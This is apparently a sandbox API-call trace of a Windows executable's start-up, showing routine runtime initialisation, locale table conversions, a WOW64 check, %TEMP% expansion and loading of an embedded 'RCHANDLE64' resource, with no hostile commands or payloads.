[0234.712] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76d30000 [0234.712] GetProcAddress (hModule=0x76d30000, lpProcName="FlsAlloc") returned 0x76d44f2b [0234.712] GetProcAddress (hModule=0x76d30000, lpProcName="FlsFree") returned 0x76d4359f [0234.713] GetProcAddress (hModule=0x76d30000, lpProcName="FlsGetValue") returned 0x76d41252 [0234.713] GetProcAddress (hModule=0x76d30000, lpProcName="FlsSetValue") returned 0x76d44208 [0234.713] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSectionEx") returned 0x76d44d28 [0234.713] GetProcAddress (hModule=0x76d30000, lpProcName="CreateEventExW") returned 0x76dc410b [0234.713] GetProcAddress (hModule=0x76d30000, lpProcName="CreateSemaphoreExW") returned 0x76dc4195 [0234.713] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadStackGuarantee") returned 0x76d4d31f [0234.713] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThreadpoolTimer") returned 0x76d5ee7e [0234.713] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadpoolTimer") returned 0x77c8441c [0234.713] GetProcAddress (hModule=0x76d30000, lpProcName="WaitForThreadpoolTimerCallbacks") returned 0x77cac50e [0234.713] GetProcAddress (hModule=0x76d30000, lpProcName="CloseThreadpoolTimer") returned 0x77cac381 [0234.713] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThreadpoolWait") returned 0x76d5f088 [0234.713] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadpoolWait") returned 0x77c905d7 [0234.713] GetProcAddress (hModule=0x76d30000, lpProcName="CloseThreadpoolWait") returned 0x77caca24 [0234.714] GetProcAddress (hModule=0x76d30000, lpProcName="FlushProcessWriteBuffers") returned 0x77c60b8c [0234.714] GetProcAddress (hModule=0x76d30000, lpProcName="FreeLibraryWhenCallbackReturns") returned 0x77d1fde8 [0234.714] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcessorNumber") returned 0x77cb1e1d [0234.714] GetProcAddress (hModule=0x76d30000, lpProcName="GetLogicalProcessorInformation") returned 0x76dc4761 [0234.714] GetProcAddress (hModule=0x76d30000, lpProcName="CreateSymbolicLinkW") returned 0x76dbcd11 [0234.714] GetProcAddress (hModule=0x76d30000, lpProcName="SetDefaultDllDirectories") returned 0x0 [0234.714] GetProcAddress (hModule=0x76d30000, lpProcName="EnumSystemLocalesEx") returned 0x76dc424f [0234.714] GetProcAddress (hModule=0x76d30000, lpProcName="CompareStringEx") returned 0x76dc46b1 [0234.714] GetProcAddress (hModule=0x76d30000, lpProcName="GetDateFormatEx") returned 0x76dd6676 [0234.714] GetProcAddress (hModule=0x76d30000, lpProcName="GetLocaleInfoEx") returned 0x76dc4751 [0234.714] GetProcAddress (hModule=0x76d30000, lpProcName="GetTimeFormatEx") returned 0x76dd65f1 [0234.714] GetProcAddress (hModule=0x76d30000, lpProcName="GetUserDefaultLocaleName") returned 0x76dc47c1 [0234.714] GetProcAddress (hModule=0x76d30000, lpProcName="IsValidLocaleName") returned 0x76dc47e1 [0234.715] GetProcAddress (hModule=0x76d30000, lpProcName="LCMapStringEx") returned 0x76dc47f1 [0234.715] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentPackageId") returned 0x0 [0234.715] GetProcAddress (hModule=0x76d30000, lpProcName="GetTickCount64") returned 0x76d5eee0 [0234.715] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileInformationByHandleExW") returned 0x0 [0234.715] GetProcAddress (hModule=0x76d30000, lpProcName="SetFileInformationByHandleW") returned 0x0 [0236.701] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x8, Size=0x3bc) returned 0x2a6080 [0236.701] GetCurrentThreadId () returned 0x38c [0236.701] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x18) returned 0x2a6448 [0236.701] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x8, Size=0x800) returned 0x2a6468 [0236.701] GetStartupInfoW (in: lpStartupInfo=0x18fed8 | out: lpStartupInfo=0x18fed8*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="tdq963ii.exe -accepteula \"told.exe\" -nobanner", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x40ad42, hStdOutput=0x75b31ac, hStdError=0x0)) [0236.701] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3 [0236.701] GetFileType (hFile=0x3) returned 0x2 [0236.702] GetStdHandle (nStdHandle=0xfffffff5) returned 0x80 [0236.702] GetFileType (hFile=0x80) returned 0x3 [0236.702] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0236.702] GetFileType (hFile=0xb) returned 0x2 [0236.702] GetCommandLineW () returned="tdq963ii.exe -accepteula \"told.exe\" -nobanner" [0236.702] GetEnvironmentStringsW () returned 0x2a6c70* [0236.702] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0xb78) returned 0x2a77f0 [0236.703] FreeEnvironmentStringsW (penv=0x2a6c70) returned 1 [0236.703] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x426ea0, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tdq963ii.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tdq963ii.exe")) returned 0x32 [0236.703] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x6c) returned 0x2a6c70 [0236.703] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x8, Size=0xa0) returned 0x2a6ce8 [0236.703] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x8, Size=0x3e) returned 0x2a8388 [0236.703] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x8, Size=0x6c) returned 0x2a6d90 [0236.703] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x8, Size=0x6e) returned 0x2a6e08 [0236.703] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x8, Size=0x78) returned 0x29f8a8 [0236.703] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x8, Size=0x62) returned 0x2a6e80 [0236.703] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x8, Size=0x2e) returned 0x2a6ef0 [0236.703] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x8, Size=0x48) returned 0x2a6f28 [0236.703] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x8, Size=0x1c) returned 0x2a5a50 [0236.703] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x8, Size=0x28) returned 0x2a6f78 [0236.703] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x8, Size=0x1a) returned 0x2a5a78 [0236.703] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x8, Size=0x4a) returned 0x2a6fa8 [0236.703] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x8, Size=0x72) returned 0x29f928 [0236.703] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x8, Size=0x30) returned 0x2a7000 [0236.703] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x8, Size=0x2e) returned 0x2a7038 [0236.721] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x8, Size=0x1c) returned 0x2a5aa0 [0236.721] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x8, Size=0xd2) returned 0x2a7070 [0236.721] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x8, Size=0x7c) returned 0x2a7150 [0236.721] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x8, Size=0x36) returned 0x2a71d8 [0236.721] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x8, Size=0x3a) returned 0x2a83d0 [0236.721] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x8, Size=0x90) returned 0x2a7218 [0236.721] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x8, Size=0x24) returned 0x2a72b0 [0236.721] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x8, Size=0x30) returned 0x2a72e0 [0236.721] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x8, Size=0x36) returned 0x2a7318 [0236.721] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x8, Size=0x48) returned 0x2a7358 [0236.721] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x8, Size=0x52) returned 0x2a73a8 [0236.721] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x8, Size=0x3c) returned 0x2a8418 [0236.721] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x8, Size=0x18) returned 0x2a7408 [0236.721] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x8, Size=0x82) returned 0x2a7428 [0236.721] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x8, Size=0x2e) returned 0x2a74b8 [0236.721] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x8, Size=0x1e) returned 0x2a5ac8 [0236.721] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x8, Size=0x2c) returned 0x2a74f0 [0236.721] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x8, Size=0x54) returned 0x2a7528 [0236.721] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x8, Size=0x52) returned 0x2a7588 [0236.721] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x8, Size=0x2a) returned 0x2a75e8 [0236.721] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x8, Size=0x3c) returned 0x2a8460 [0236.721] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x8, Size=0x54) returned 0x2a7620 [0236.721] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x8, Size=0x24) returned 0x2a7680 [0236.721] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x8, Size=0x30) returned 0x2a76b0 [0236.721] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x8, Size=0x8c) returned 0x2a76e8 [0236.722] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2a77f0 | out: hHeap=0x290000) returned 1 [0236.722] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x8, Size=0x800) returned 0x2a7780 [0236.722] GetLastError () returned 0x0 [0236.722] SetLastError (dwErrCode=0x0) [0236.722] GetLastError () returned 0x0 [0236.722] SetLastError (dwErrCode=0x0) [0236.722] GetLastError () returned 0x0 [0236.722] SetLastError (dwErrCode=0x0) [0236.722] GetACP () returned 0x4e4 [0236.722] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x220) returned 0x2a7f88 [0236.722] GetLastError () returned 0x0 [0236.722] SetLastError (dwErrCode=0x0) [0236.722] IsValidCodePage (CodePage=0x4e4) returned 1 [0236.723] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18fecc | out: lpCPInfo=0x18fecc) returned 1 [0236.723] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f994 | out: lpCPInfo=0x18f994) returned 1 [0236.723] GetLastError () returned 0x0 [0236.723] SetLastError (dwErrCode=0x0) [0236.723] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0236.723] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x18f718, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0236.723] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x18f9a8 | out: lpCharType=0x18f9a8) returned 1 [0236.723] GetLastError () returned 0x0 [0236.723] SetLastError (dwErrCode=0x0) [0236.723] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0236.723] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x18f6e8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0236.723] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0236.723] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18f4d8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ") returned 256 [0236.723] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchWideChar=256, lpMultiByteStr=0x18fca8, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ<0[\x07äþ\x18", lpUsedDefaultChar=0x0) returned 256 [0236.723] GetLastError () returned 0x0 [0236.723] SetLastError (dwErrCode=0x0) [0236.723] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0236.723] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x18f6f8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0236.723] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0236.723] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18f4e8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ") returned 256 [0236.723] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ", cchWideChar=256, lpMultiByteStr=0x18fba8, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ<0[\x07äþ\x18", lpUsedDefaultChar=0x0) returned 256 [0236.723] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x8, Size=0x80) returned 0x2a81b0 [0236.723] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0236.723] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x40f584) returned 0x0 [0236.724] RtlSizeHeap (HeapHandle=0x290000, Flags=0x0, MemoryPointer=0x2a81b0) returned 0x80 [0236.724] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76d30000 [0236.724] GetProcAddress (hModule=0x76d30000, lpProcName="IsWow64Process") returned 0x76d4195e [0236.724] GetCurrentProcess () returned 0xffffffff [0236.724] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x18ff34 | out: Wow64Process=0x18ff34) returned 1 [0236.724] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x18fd28, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tdq963ii.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tdq963ii.exe")) returned 0x32 [0236.724] ExpandEnvironmentStringsW (in: lpSrc="%TEMP%", lpDst=0x18fb20, nSize=0x104 | out: lpDst="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp") returned 0x25 [0236.724] FindResourceW (hModule=0x0, lpName="RCHANDLE64", lpType="BINRES") returned 0x476060 [0236.724] LoadResource (hModule=0x0, hResInfo=0x476060) returned 0x43c648 [0236.724] SizeofResource (hModule=0x0, hResInfo=0x476060) returned 0x37490 [0236.724] LockResource (hResData=0x43c648) 